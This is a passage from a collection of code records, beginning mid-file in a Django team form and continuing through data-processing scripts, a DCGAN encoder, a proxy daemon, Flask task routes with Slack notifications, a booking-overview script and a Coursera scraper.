empty.\")\n\n if categories:\n self.fields['category'].widget = forms.RadioSelect(\n choices=categories, renderer=TeamCategoryRadioSelectRenderer\n )\n else:\n del self.fields['category']\n\n def _clean_member(self, index):\n manual = self.cleaned_data.get('member{}_manual'.format(index))\n username = self.cleaned_data.get('member{}_username'.format(index))\n\n if username and username.strip():\n username = username.strip()\n try:\n user = User.objects.get(username__iexact=username)\n except User.DoesNotExist:\n raise ValidationError(_(\"Unknown username \\\"%s\\\".\") % username)\n if user.id == self.user.id:\n raise ValidationError(_(\"You are automatically added to the team.\"))\n if (\n TeamMember.objects.filter(\n team__competition_id=self.competition_id,\n member_id=user.id,\n invitation_status=TeamMember.INVITATION_ACCEPTED,\n )\n .exclude(team_id=self.instance.id)\n .exists()\n ):\n msg = _(\"User \\\"%s\\\" is already a member of a team.\") % username\n raise ValidationError(msg)\n return (user.username, user)\n if manual and manual.strip():\n return (manual.strip(), None)\n return None\n\n def clean_name(self):\n name = self.cleaned_data['name'].strip()\n if (\n Team.objects.filter(competition_id=self.competition_id, name__iexact=name)\n .exclude(id=self.instance.id)\n .exists()\n ):\n raise ValidationError(_(\"Team name already used!\"))\n return name\n\n def clean(self):\n members = []\n ids = set()\n for k in xrange(2, self.max_team_size + 1):\n member = self._clean_member(k)\n if 
not member:\n continue\n if isinstance(member[1], User):\n if member[1].id not in ids:\n ids.add(member[1].id)\n members.append(member)\n else:\n members.append(member)\n\n self._members = members\n\n if self.team_categories:\n try:\n category = self.cleaned_data['category']\n except KeyError:\n self.cleaned_data['category'] = self.team_categories[-1][0]\n else:\n if not any(category == k for k, v in self.team_categories):\n raise ValidationError(_(\"Unknown team category '%s'!\") % category)\n\n return self.cleaned_data\n\n class Meta:\n model = Team\n fields = ['name', 'category']\n\n\nclass TaskListAdminPanelForm(forms.Form):\n filter_by_team_type = forms.ChoiceField(\n [\n (Team.TYPE_NORMAL, ugettext_lazy(\"Competitors\")),\n (Team.TYPE_UNOFFICIAL, ugettext_lazy(\"Unofficial\")),\n (Team.TYPE_ADMIN_PRIVATE, ugettext_lazy(\"Administrators\")),\n ]\n )\n filter_by_status = forms.ChoiceField(\n [('S', \"Solved\"), ('F', \"Failed\"), ('T', \"Tried\")]\n )\n","sub_path":"skoljka/competition/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":13623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"579773626","text":"import numpy as np\nimport pandas as pd\nfrom collections import defaultdict\n\n## load data\ntr = pd.read_csv('../temporal_data/train_id_cnt_svd_stamp.csv')\nte = pd.read_csv('../temporal_data/test_id_cnt_svd_stamp.csv')\n\nprint('data loaded.')\nprint(len(tr))\nprint(len(te))\n\n## continous index\nconcat = tr[['msno', 'song_id', 'source_type', 'source_screen_name', 'timestamp']].append(te[['msno', \\\n 'song_id', 'source_type', 'source_screen_name', 'timestamp']])\n\n## before data\nsong_dict = defaultdict(lambda: None)\ntype_dict = defaultdict(lambda: None)\nname_dict = defaultdict(lambda: None)\ntime_dict = defaultdict(lambda: None)\n\nbefore_data = np.zeros((len(concat), 4))\nfor i in range(len(concat)):\n msno = concat['msno'].values[i]\n \n if(song_dict[msno] == None):\n before_data[i] = concat[['song_id', 'source_type', 'source_screen_name', 'timestamp']].values[i]\n before_data[i, 3] = np.nan\n else:\n before_data[i, 0] = song_dict[msno]\n before_data[i, 1] = type_dict[msno]\n before_data[i, 2] = name_dict[msno]\n before_data[i, 3] = time_dict[msno]\n\n song_dict[msno] = concat['song_id'].values[i]\n type_dict[msno] = concat['source_type'].values[i]\n name_dict[msno] = concat['source_screen_name'].values[i]\n time_dict[msno] = concat['timestamp'].values[i]\n\nprint('data before done.')\n\n## after data\nsong_dict = defaultdict(lambda: None)\ntype_dict = defaultdict(lambda: None)\nname_dict = defaultdict(lambda: None)\ntime_dict = defaultdict(lambda: None)\n\nafter_data = np.zeros((len(concat), 4))\nfor i in range(len(concat))[::-1]:\n msno = concat['msno'].values[i]\n \n if(song_dict[msno] == None):\n after_data[i] = concat[['song_id', 'source_type', 'source_screen_name', 'timestamp']].values[i]\n after_data[i, 3] = np.nan\n else:\n after_data[i, 0] = song_dict[msno]\n after_data[i, 1] = type_dict[msno]\n after_data[i, 2] = name_dict[msno]\n after_data[i, 3] = time_dict[msno]\n\n song_dict[msno] = concat['song_id'].values[i]\n type_dict[msno] = concat['source_type'].values[i]\n name_dict[msno] = concat['source_screen_name'].values[i]\n time_dict[msno] = concat['timestamp'].values[i]\n\nprint('data after done.')\n\n## to_csv\nidx = 0\nfor i in ['song_id', 'source_type', 'source_screen_name', 'timestamp']:\n tr['before_'+i] = before_data[:len(tr), idx]\n tr['after_'+i] = after_data[:len(tr), idx]\n \n 
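# test-set rows sit after the train rows in the concatenated before/after arrays\n 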
te['before_'+i] = before_data[len(tr):, idx]\n te['after_'+i] = after_data[len(tr):, idx]\n \n idx += 1\n\nfor i in ['song_id', 'source_type', 'source_screen_name']:\n tr['before_'+i] = tr['before_'+i].astype(int)\n te['before_'+i] = te['before_'+i].astype(int)\n tr['after_'+i] = tr['after_'+i].astype(int)\n te['after_'+i] = te['after_'+i].astype(int)\n\ntr['before_timestamp'] = np.log1p(tr['timestamp'] - tr['before_timestamp'])\nte['before_timestamp'] = np.log1p(te['timestamp'] - te['before_timestamp'])\n\ntr['after_timestamp'] = np.log1p(tr['after_timestamp'] - tr['timestamp'])\nte['after_timestamp'] = np.log1p(te['after_timestamp'] - te['timestamp'])\n\ntr['before_timestamp'].fillna(np.nanmean(tr['before_timestamp']), inplace=True)\nte['before_timestamp'].fillna(np.nanmean(te['before_timestamp']), inplace=True)\ntr['after_timestamp'].fillna(np.nanmean(tr['after_timestamp']), inplace=True)\nte['after_timestamp'].fillna(np.nanmean(te['after_timestamp']), inplace=True)\n\ntr.to_csv('../temporal_data/train_id_cnt_svd_stamp_before_after.csv', index=False)\nte.to_csv('../temporal_data/test_id_cnt_svd_stamp_before_after.csv', index=False)\n","sub_path":"input/validation/script/before_after_process.py","file_name":"before_after_process.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"166525176","text":"#!/usr/bin/env python3\n\nimport numpy as np\nfrom skimage import io\n\nrecons_train_data_list = 'data_info/recons_train_data_patch_list.txt'\n\ndef read_image_list(data_list):\n f = open(data_list, 'r')\n image_paths = []\n for line in f:\n image = line.strip(\"\\n\")\n image_paths.append(image)\n\n return image_paths\n\n\n# # https://stackoverflow.com/questions/15638612/calculating-mean-and-standard-deviation-of-the-data-which-does-not-fit-in-memory\n# def online_mean_and_std(image_list):\n# n = 0\n# mean = 0\n# var = 0\n\n# count = 0\n\n# for index, image_path in enumerate(image_list):\n# x = io.imread(image_path)\n# x = np.asarray(x, dtype=np.float32)\n# x = x / 255\n\n# # print(x.shape)\n# # print(x[0, 0].shape)\n# # break\n\n# n = n + 1\n# delta = x - mean\n# mean = mean + delta / n\n# var = var + delta * (x - mean)\n\n# if index % 1000 == 0:\n# print(index)\n\n# # count += 1\n# # if count == 3:\n# # print('x.shape: ', x.shape)\n# # print('x: ', x)\n# # print('n: ', n)\n\n# # print('delta.shape: ', delta.shape)\n# # print('delta: ', delta)\n\n# # print('mean.shape: ', mean.shape)\n# # print('mean: ', mean)\n\n# # print('var.shape: ', var.shape)\n# # print('var: ', var)\n\n# # break\n\n\n# std = np.sqrt(var)\n\n\n# return mean, std\n\n\ndef online_mean_and_std_channel(image_list):\n n = 0\n mean = 0\n square_mean = 0\n\n # count = 0\n\n for index, image_path in enumerate(image_list):\n x = io.imread(image_path)\n x = np.asarray(x, dtype=np.float32)\n\n # x = x / 255\n\n # print(x.shape)\n # print(x[0, 0].shape)\n # break\n\n prev_n = n\n n += x.shape[0] * x.shape[1]\n\n x = x.reshape([-1, 3])\n square_x = np.square(x)\n\n square_mean = square_mean * (1.0 * prev_n / n) + np.sum(square_x, axis=0) / n\n mean = mean * (1.0 * prev_n / n) + np.sum(x, axis=0) / n\n\n if index % 10000 == 0:\n print(index)\n\n # print(1.0 * prev_n / n)\n # print(index)\n # print(x.shape)\n # print(square_x.shape)\n # print(np.sum(x, axis=0) / (128 * 128))\n # print(np.sum(square_x, axis=0) / (128 * 128))\n # print(mean)\n # print(square_mean)\n\n # if index == 10:\n # break\n\n var = square_mean - np.square(mean)\n 
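# Var[x] = E[x^2] - (E[x])^2, computed per channel\n 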
std = np.sqrt(var)\n\n return mean, std\n\n\ndef save_params(mean, std):\n # filename ='normalization_params.npz'\n\n filename ='rm_block_effect/channel_normalization_params.npz'\n\n np.savez(filename, mean=mean, std=std)\n print('Normalization parameters saved to {}'.format(filename))\n\n print('-----')\n print(mean)\n print('Mean max: {}'.format(np.max(mean)))\n print('Mean min: {}'.format(np.min(mean)))\n print('-----')\n print(std)\n print('Std max: {}'.format(np.max(std)))\n print('Std min: {}'.format(np.min(std)))\n print('-----')\n\n\nimage_list = read_image_list(recons_train_data_list)\n# mean, std = online_mean_and_std(image_list)\n\nmean, std = online_mean_and_std_channel(image_list)\nsave_params(mean, std)\n","sub_path":"rm_block_effect/get_bf_rm_normalization_params.py","file_name":"get_bf_rm_normalization_params.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"216355083","text":"from torch import nn, Tensor\n\nfrom framework.gan.generator import Generator as G\nfrom framework.nn.modules.common.self_attention import SelfAttention2d\nfrom framework.nn.modules.resnet.residual import Down2xResidualBlock, PaddingType\nfrom useful_utils.spectral_functions import spectral_norm_init\n\n\nclass DCEncoder(G):\n def __init__(self, nc: int = 3, nc_out: int = 10, ndf: int = 32):\n super(DCEncoder, self).__init__()\n\n self.main = nn.Sequential(\n spectral_norm_init(nn.Conv2d(nc, ndf, 4, 2, 1, bias=False)),\n nn.BatchNorm2d(ndf),\n nn.LeakyReLU(0.2, inplace=True),\n # nn.InstanceNorm2d(ndf, affine=True),\n # input is (ndf) x 64 x 64\n spectral_norm_init(nn.Conv2d(ndf, ndf, 4, 2, 1, bias=False)),\n nn.BatchNorm2d(ndf),\n nn.LeakyReLU(0.2, inplace=True),\n # nn.InstanceNorm2d(ndf, affine=True),\n # state size. (ndf) x 32 x 32\n SelfAttention2d(ndf),\n spectral_norm_init(nn.Conv2d(ndf, ndf * 2, 4, 2, 1, bias=False)),\n nn.BatchNorm2d(ndf * 2),\n nn.LeakyReLU(0.2, inplace=True),\n # nn.InstanceNorm2d(ndf * 2, affine=True),\n # state size. (ndf*2) x 16 x 16\n spectral_norm_init(nn.Conv2d(ndf * 2, ndf * 4, 4, 2, 1, bias=False)),\n nn.BatchNorm2d(ndf * 4),\n nn.LeakyReLU(0.2, inplace=True),\n # nn.InstanceNorm2d(ndf * 4, affine=True),\n # state size. 
(ndf*4) x 8 x 8\n spectral_norm_init(nn.Conv2d(ndf * 4, ndf * 8, 4, 2, 1, bias=False)),\n nn.BatchNorm2d(ndf * 8),\n nn.LeakyReLU(0.2, inplace=True),\n )\n\n self.linear = spectral_norm_init(nn.Linear(ndf * 8 * 4 * 4, nc_out))\n\n def forward(self, x: Tensor) -> Tensor:\n conv = self.main(x)\n return self.linear(\n conv.view(conv.shape[0], -1)\n )\n","sub_path":"gan/dcgan/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"153018769","text":"class Employee:\n def __init__(self, first, last, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.first = first\n self.last = last\n # self.pay = pay\n # self.email = first + \".\" + last + \"@company.com\"\n # Employee.num_of_employees += 1\n\n @property\n def email(self):\n return \"{}.{}@company.com\".format(self.first, self.last)\n\n @property\n def fullname(self):\n return \"{} {}\".format(self.first, self.last)\n\n @fullname.setter\n def fullname(self, name):\n first, last = name.split(\" \")\n self.first = first\n self.last = last\n\n @fullname.deleter\n def fullname(self):\n print(\"Delete Name!\")\n self.first = None\n self.last = None\n\n\nemp1 = Employee(\"Vasudev\", \"Patil\")\nemp2 = Employee(\"test\", \"user\")\n\nemp1.fullname = \"John Smith\"\n# emp1.first = \"Jim\"\n\nprint(emp1.first)\nprint(emp1.email)\nprint(emp1.fullname)\n\ndel emp1.fullname\n","sub_path":"usingPropertyDecorators.py","file_name":"usingPropertyDecorators.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"218217109","text":"import os\nimport sys\nimport errno\nimport signal\nimport pynsive\nimport inspect\nimport socket\nimport multiprocessing\n\nfrom tornado.ioloop import IOLoop\nfrom tornado.netutil import bind_sockets\nfrom tornado.process import cpu_count\n\nfrom pyrox.log import get_logger, get_log_manager\nfrom pyrox.filtering import HttpFilterPipeline\nfrom pyrox.util.config import ConfigurationError\nfrom pyrox.server.config import load_pyrox_config\nfrom pyrox.server.proxyng import TornadoHttpProxy\n\n\n_LOG = get_logger(__name__)\n_active_children_pids = list()\n\n\nclass FunctionWrapper(object):\n\n def __init__(self, func):\n self._func = func\n\n def on_request(self, request):\n return self._func(request)\n\n def on_response(self, response):\n return self._func(response)\n\n\ndef stop_child(signum, frame):\n IOLoop.instance().add_callback_from_signal(\n lambda: IOLoop.current().stop())\n\n\ndef stop_parent(signum, frame):\n for pid in _active_children_pids:\n os.kill(pid, signal.SIGTERM)\n\n\ndef _resolve_filter_classes(cls_list):\n filter_cls_list = list()\n\n # Gather the classes listed in the order they're listed\n for cdef in cls_list:\n # If there's a complex module path, process the ends of it\n if '.' 
not in cdef:\n raise ImportError('Bad filter class: {}'.format(cdef))\n\n module = pynsive.import_module(cdef[:cdef.rfind('.')])\n\n try:\n cls = getattr(module, cdef[cdef.rfind('.') + 1:])\n if inspect.isclass(cls):\n filter_cls_list.append(cls)\n elif inspect.isfunction(cls):\n def create():\n return FunctionWrapper(cls)\n filter_cls_list.append(create)\n else:\n raise TypeError(\n 'Type of a filter must be a function or a class')\n except AttributeError:\n raise ImportError('Unable to import: {}'.format(cdef))\n return filter_cls_list\n\n\ndef _build_plfactory_closure(filter_cls_list):\n # Closure for creation of new pipelines\n def new_filter_pipeline():\n pipeline = HttpFilterPipeline()\n for cls in filter_cls_list:\n pipeline.add_filter(cls())\n return pipeline\n return new_filter_pipeline\n\n\ndef _build_singleton_plfactory_closure(filter_classes, filter_instances):\n # Closure for creation of new singleton pipelines\n def new_filter_pipeline():\n pipeline = HttpFilterPipeline()\n for cls in filter_classes:\n pipeline.add_filter(filter_instances[cls.__name__])\n return pipeline\n return new_filter_pipeline\n\n\ndef _build_singleton_plfactories(config):\n all_classes = list()\n filter_instances = dict()\n\n # Gather all the classes\n all_classes.extend(_resolve_filter_classes(config.pipeline.upstream))\n all_classes.extend(_resolve_filter_classes(config.pipeline.downstream))\n\n for cls in all_classes:\n filter_instances[cls.__name__] = cls()\n\n upstream = _build_singleton_plfactory_closure(\n _resolve_filter_classes(config.pipeline.upstream), filter_instances)\n downstream = _build_singleton_plfactory_closure(\n _resolve_filter_classes(config.pipeline.downstream), filter_instances)\n return upstream, downstream\n\n\ndef _build_plfactories(config):\n upstream = _build_plfactory_closure(\n _resolve_filter_classes(config.pipeline.upstream))\n downstream = _build_plfactory_closure(\n _resolve_filter_classes(config.pipeline.downstream))\n return upstream, downstream\n\n\ndef start_proxy(sockets, config):\n # Take over SIGTERM and SIGINT\n signal.signal(signal.SIGTERM, stop_child)\n signal.signal(signal.SIGINT, stop_child)\n\n # Create a PluginManager\n plugin_manager = pynsive.PluginManager()\n for path in config.core.plugin_paths:\n plugin_manager.plug_into(path)\n\n # Resolve our filter chains\n try:\n if config.pipeline.use_singletons:\n filter_pipeline_factories = _build_singleton_plfactories(config)\n else:\n filter_pipeline_factories = _build_plfactories(config)\n except Exception as ex:\n _LOG.exception(ex)\n return -1\n\n #TODO(jwood) Get SSL info from config file.\n ssl_options = None\n # {\n # \"certfile\": \"/Users/john.wood/projects/security/tornado_related/pyrox/test.crt\",\n # \"keyfile\": \"/Users/john.wood/projects/security/tornado_related/pyrox/test.key\"\n # }\n\n # Create proxy server ref\n http_proxy = TornadoHttpProxy(\n filter_pipeline_factories,\n config.routing.upstream_hosts,\n ssl_options=ssl_options)\n\n # Add our sockets for watching\n http_proxy.add_sockets(sockets)\n\n # Start tornado\n IOLoop.current().start()\n\n\ndef start_pyrox(other_cfg=None):\n config = load_pyrox_config(other_cfg) if other_cfg else load_pyrox_config()\n\n # Init logging\n logging_manager = get_log_manager()\n logging_manager.configure(config)\n\n # dst = config.routing.upstream_hosts\n # print(\"________ dst:{}\".format(dst))\n # print(\"________ dst0/1:{0}/{1}\".format(dst[0], dst[1]))\n\n _LOG.info('Upstream targets are: {}'.format(\n ['https://{0}:{1}'.format(dst[0], dst[1])\n 
for dst in config.routing.upstream_hosts]))\n\n # Set bind host\n bind_host = config.core.bind_host.split(':')\n if len(bind_host) != 2:\n raise ConfigurationError('bind_host must have a port specified')\n\n # Bind the sockets in the main process\n sockets = bind_sockets(port=bind_host[1], address=bind_host[0])\n\n # Bind the server port(s)\n _LOG.info('Pyrox listening on: http://{0}:{1}'.format(\n bind_host[0], bind_host[1]))\n\n # Start Tornado\n num_processes = config.core.processes\n\n if num_processes <= 0:\n num_processes = cpu_count()\n\n global _active_children_pids\n\n for i in range(num_processes):\n pid = os.fork()\n if pid == 0:\n print('Starting process {}'.format(i))\n start_proxy(sockets, config)\n sys.exit(0)\n else:\n _active_children_pids.append(pid)\n\n # Take over SIGTERM and SIGINT\n signal.signal(signal.SIGTERM, stop_parent)\n signal.signal(signal.SIGINT, signal.SIG_IGN)\n\n while len(_active_children_pids):\n try:\n pid, status = os.wait()\n except OSError as oserr:\n if oserr.errno != errno.EINTR:\n _LOG.exception(oserr)\n continue\n except Exception as ex:\n _LOG.exception(ex)\n continue\n\n _LOG.info('Child process {} exited with status {}'.format(\n pid, status))\n _active_children_pids.remove(pid)\n","sub_path":"pyrox/server/daemon.py","file_name":"daemon.py","file_ext":"py","file_size_in_byte":6647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"235440779","text":"class Solution:\n def game(self, guess,answer):\n Count=0\n for i in range(len(guess)):\n Guess=guess[i]\n if Guess==answer[i]:\n Count+=1\n return Count\n\nif __name__==\"__main__\":\n print(Solution().game([2,2,3],[3,2,3]))","sub_path":"LeetCode/猜数字.py","file_name":"猜数字.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"160466509","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Dec 17 10:38:27 2020\r\n\r\n@author: tho2303\r\n\"\"\"\r\nimport requests\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom decimal import*\r\nimport dataframe_image as dfi #renders a table image directly from a pd.DataFrame\r\n\r\n#%% Variables\r\nMaaned=2\r\nDato=22\r\nnamelength=20\r\ntimeshift=+1\r\n#%% fetch the csv file from the BK app\r\nbody = {\r\n 'email':'',\r\n 'password':''\r\n}\r\n\r\nresponse = requests.post('https://app.buldrekontoret.com/api/login', json=body)\r\nrequestCookies = {'connect.sid': response.cookies['connect.sid']}\r\ndata = requests.get('https://app.buldrekontoret.com/api/admin/reservations.csv', cookies=requestCookies)\r\n#%% tidy up the data string and collect it into array M, ready for sorting\r\nstring=data.text.replace('\\r\\n',',') \r\nlist= string.split(\",\")\r\n\r\nM=np.zeros(int((len(list)/3)),dtype=object)\r\n\r\nfor i in range(0,len(M)): \r\n M[i]=list[i*3]+list[i*3+1]+list[i*3+2]\r\n \r\nMs=np.sort(M) #sort M \r\n\r\n#%% count the entries n that match the month and date\r\nn=0\r\nfor i in range (0,len(M)):\r\n if int(Ms[i][5:7])==Maaned and int(Ms[i][8:10])==Dato:\r\n n+=1\r\n#%% split the sorted list into a new array T\r\nT=np.zeros([n,5],dtype=object)\r\nN=0\r\nfor i in range (0,len(M)):\r\n getcontext().prec =4\r\n tekst=Ms[i]\r\n if int(tekst[5:7])==Maaned and int(tekst[8:10])==Dato:\r\n T[N,0]=int(tekst[5:7])\r\n T[N,1]=int(tekst[8:10])\r\n T[N,2]=Decimal(tekst[11:13]+'.'+tekst[14:16])+timeshift \r\n T[N,3]=Decimal(tekst[35:37]+'.'+tekst[38:40])+timeshift\r\n T[N,4]=tekst[48:48+namelength]\r\n N+=1\r\n \r\n#%% Create a pandas DataFrame from T\r\n
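# each row of T: month, day, start time, stop time, booker name\r\n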
data = pd.DataFrame(T)\r\ndata.rename(columns={0: 'Month', 1: 'Day',2: 'Start', 3: 'Stop', 4: 'Name'}, inplace=True)\r\nprint(data)\r\n#%% export to a png table\r\ndf_styled = data.style.background_gradient() \r\ndfi.export(df_styled,\"Bookingoversikt.png\")\r\n \r\n","sub_path":"Bookingoversikt.py","file_name":"Bookingoversikt.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"213276205","text":"from flask.wrappers import Response\nfrom sqlalchemy.orm import query\nfrom app import db\nfrom app.models.task import Task\nfrom flask import Blueprint, jsonify, make_response, request\nfrom datetime import datetime\nimport os\nimport requests\nfrom app.models.goal import Goal\n\ntasks_bp = Blueprint(\"tasks\", __name__, url_prefix=\"/tasks\")\n\n@tasks_bp.route(\"\", methods=[\"GET\", \"POST\"])\ndef handle_tasks():\n if request.method == \"POST\":\n \n request_body = request.get_json()\n \n if \"title\" not in request_body or \"description\" not in request_body or \"completed_at\" not in request_body:\n return {\n \"details\": \"Invalid data\"\n },400\n new_task = Task(title=request_body[\"title\"],\n description=request_body[\"description\"],\n completed_at=request_body[\"completed_at\"])\n is_complete = new_task.completed_at is not None\n\n db.session.add(new_task)\n db.session.commit()\n\n return {'task':\n {\"id\": new_task.task_id,\n \"title\": new_task.title,\n \"description\": new_task.description,\n \n \"is_complete\": is_complete\n }},201\n \n elif request.method == \"GET\":\n query = request.args.get(\"sort\")\n if query == \"asc\":\n tasks = Task.query.order_by(Task.title)\n elif query == \"desc\":\n tasks = Task.query.order_by(Task.title.desc()) \n else:\n tasks = Task.query.all()\n tasks_response = []\n for task in tasks:\n is_complete = task.completed_at is not None\n tasks_response.append({\n \"id\": task.task_id,\n \"title\": task.title,\n \"description\": task.description,\n \n \"is_complete\": is_complete\n })\n return jsonify(tasks_response)\n\n@tasks_bp.route(\"/<task_id>\", methods=[\"GET\", \"PUT\", \"DELETE\"])\ndef handle_task(task_id):\n task = Task.query.get(task_id)\n if task is None:\n return make_response(\"\", 404)\n\n if request.method == \"GET\":\n response_body = {\"task\": (task.to_dict())}\n return jsonify(response_body),200 \n \n \n elif request.method == \"PUT\":\n form_data = request.get_json()\n\n task.title = form_data[\"title\"]\n task.description = form_data[\"description\"]\n if \"completed_at\" in form_data :\n task.completed_at = form_data[\"completed_at\"]\n else:\n task.completed_at = None\n\n db.session.commit()\n \n\n return {\"task\":\n {\n \"id\": task.task_id,\n \"title\": task.title,\n \"description\": task.description,\n \"is_complete\":bool(task.completed_at) \n }\n },200\n \n elif request.method == \"DELETE\":\n db.session.delete(task)\n db.session.commit()\n return {\n \"details\": f'Task {task_id} \"{task.title}\" successfully deleted'\n }\n\n@tasks_bp.route(\"/<task_id>/mark_complete\", methods=[\"PATCH\"])\ndef mark_complete(task_id):\n if not task_id.isnumeric():\n return {\"Error\": f\"{task_id} must be numeric.\"} , 404\n task_id = int(task_id)\n task = Task.query.get(task_id)\n if not task :\n return \"None\", 404\n\n task.completed_at = datetime.utcnow()\n #save action\n db.session.commit()\n path = \"https://slack.com/api/chat.postMessage\"\n\n SLACK_API_KEY = os.environ.get(\"SLACK_API_KEY\")\n\n query_params = {\n \"token\":SLACK_API_KEY,\n \"channel\": \"task-notifications\",\n \"text\":f\"Task {task.title} is complete!\"\n }\n response = requests.post(path, data=query_params)\n \n return {\"task\":{\n \"id\":task.task_id,\n \"title\":task.title,\n \"description\": task.description,\n \"is_complete\": True\n } }, 200\n\n@tasks_bp.route(\"/<task_id>/mark_incomplete\", methods=[\"PATCH\"])\ndef mark_incomplete(task_id):\n if not task_id.isnumeric():\n return {\"Error\": f\"{task_id} must be numeric.\"} , 404\n task_id = int(task_id)\n task = Task.query.get(task_id)\n if not task :\n return \"None\", 404\n\n task.completed_at = None\n #save action\n db.session.commit()\n return {\"task\":{\n \"id\":task.task_id,\n \"title\":task.title,\n \"description\": task.description,\n \"is_complete\": False\n } }, 200\n\ngoals_bp = Blueprint(\"goals\", __name__, url_prefix=\"/goals\")\n\n\n@goals_bp.route(\"\", methods=[\"GET\", \"POST\"])\ndef handle_goals():\n if request.method == \"POST\":\n \n request_body = request.get_json()\n \n if \"title\" not in request_body:\n return {\n \"details\": \"Invalid data\"\n },400\n new_goal = Goal(title=request_body[\"title\"])\n\n db.session.add(new_goal)\n db.session.commit()\n\n return {'goal':\n {\"id\": new_goal.goal_id,\n \"title\": new_goal.title\n }},201\n \n elif request.method == \"GET\":\n query = request.args.get(\"sort\")\n if query == \"asc\":\n goals = Goal.query.order_by(Goal.title)\n elif query == \"desc\":\n goals = Goal.query.order_by(Goal.title.desc()) \n else:\n goals = Goal.query.all()\n goals_response = []\n for goal in goals:\n goals_response.append({\n \"id\": goal.goal_id,\n \"title\": goal.title\n })\n return jsonify(goals_response)\n\n@goals_bp.route(\"/<goal_id>\", methods=[\"GET\", \"PUT\", \"DELETE\"])\ndef handle_goal(goal_id):\n goal = Goal.query.get(goal_id)\n if goal is None:\n return make_response(\"\", 404)\n\n if request.method == \"GET\":\n return {\"goal\":\n {\n \"id\": goal.goal_id,\n \"title\": goal.title\n }\n }\n \n elif request.method == \"PUT\":\n form_data = request.get_json()\n goal.title = form_data[\"title\"]\n\n db.session.commit()\n \n\n return {\"goal\":\n {\n \"id\": goal.goal_id,\n \"title\": goal.title\n }\n },200\n \n elif request.method == \"DELETE\":\n db.session.delete(goal)\n db.session.commit()\n return {\n \"details\": f'Goal {goal_id} \"{goal.title}\" successfully deleted'\n }\n\n@goals_bp.route(\"/<goal_id>/tasks\", methods=[\"POST\"])\ndef post_tasks_for_goals(goal_id):\n goal = Goal.query.get_or_404(goal_id)\n request_body = request.get_json()\n\n for each_task in request_body[\"task_ids\"]:\n each_task = Task.query.get(each_task)\n each_task.fk_goal_id = goal.goal_id\n \n return make_response(jsonify({\"id\":goal.goal_id, \"task_ids\":request_body[\"task_ids\"]}),200)\n\n@goals_bp.route(\"/<goal_id>/tasks\",methods=[\"GET\"])\ndef get_tasks_for_goal(goal_id):\n goal = Goal.query.get_or_404(goal_id)\n response_body=goal.verbose_goal_dict()\n return jsonify(response_body), 200","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":6939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"487904062","text":"import argparse\nimport requests\nfrom lxml import etree\nfrom collections import namedtuple\nfrom bs4 import BeautifulSoup\nfrom openpyxl import Workbook\nimport random\n\n\nCourseData = namedtuple('CourseData', 'title,language,resent_date,count_weeks,rating')\n\n\ndef get_courses_urls_list(output_list_size):\n url = 
'https://www.coursera.org/sitemap~www~courses.xml'\n response = requests.get(url)\n tree = etree.fromstring(response.content)\n all_courses_urls_list = tree.xpath(\n '//ns:url/ns:loc/text()', namespaces={'ns': 'http://www.sitemaps.org/schemas/sitemap/0.9'})\n return random.sample(all_courses_urls_list, output_list_size)\n\n\ndef get_course_info(course_slug):\n response = requests.get(course_slug)\n soup = BeautifulSoup(response.content, 'lxml')\n basic_info_table = soup.find(\n 'table',\n attrs={\n 'class': 'basic-info-table bt3-table bt3-table-striped bt3-table-bordered bt3-table-responsive'\n }\n )\n table_body = basic_info_table.next\n rating_node = soup.find('div', attrs={'class': 'ratings-text bt3-hidden-xs'})\n return CourseData(\n title=soup.find('h1', attrs={'class': 'title display-3-text'}).text,\n language=soup.find('div', attrs={'class': 'rc-Language'}).text,\n resent_date=soup.find(\n 'div', attrs={'class': 'startdate rc-StartDateString caption-text'}).find('span').text,\n count_weeks=_get_text_from_basic_info_table(table_body, 'Commitment'),\n rating=rating_node.text if rating_node is not None else '',\n )\n\n\ndef _get_text_from_basic_info_table(table_element, row_name):\n for row in table_element.find_all('tr'):\n if row.find_all('td')[0].text == row_name:\n return row.find_all('td')[-1].text\n else:\n return ''\n\n\ndef output_courses_info_to_xlsx(file_path, curses_urls_list, class_namedtuple):\n work_book = Workbook()\n work_sheet = work_book.active\n work_sheet.append(class_namedtuple._fields)\n for course_url in curses_urls_list:\n course_info = get_course_info(course_url)\n work_sheet.append(course_info)\n work_book.save(file_path)\n\n\ndef get_args():\n parser = argparse.ArgumentParser(description='Get info from coursera')\n parser.add_argument('path', type=str, help='Path to file. 
It is better to use xlsx extension.')\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = get_args()\n file_path = args.path\n size = 20\n courses_urls_list = get_courses_urls_list(size)\n output_courses_info_to_xlsx(file_path, courses_urls_list, CourseData)\n","sub_path":"coursera.py","file_name":"coursera.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
